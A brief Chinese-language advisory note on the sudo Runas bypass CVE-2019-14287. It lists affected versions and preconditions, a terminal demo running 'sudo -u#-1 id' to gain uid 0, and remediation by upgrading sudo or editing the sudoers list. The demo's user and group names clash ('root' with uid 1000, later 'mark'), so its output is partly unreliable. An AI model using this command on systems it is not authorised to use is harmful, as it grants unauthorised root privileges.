sudo Potential bypass of Runas user restrictions(CVE-2019-14287 )
Date:
2019.10.14
类型:
sudo提权漏洞
影响版本: sudo < 1.8.28
前提:
知道当前用户的密码 当前用户存在于sudo权限列表 root@root-Pc:~$ id uid=1000(root) gid=1000(root) 组=1000(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) root@root-Pc:~$ sudo -u#-1 id [sudo] root 的密码: uid=0(root) gid=1000(mark) 组=1000(mark)
修复: 升级sudo版本 修改sudo用户列表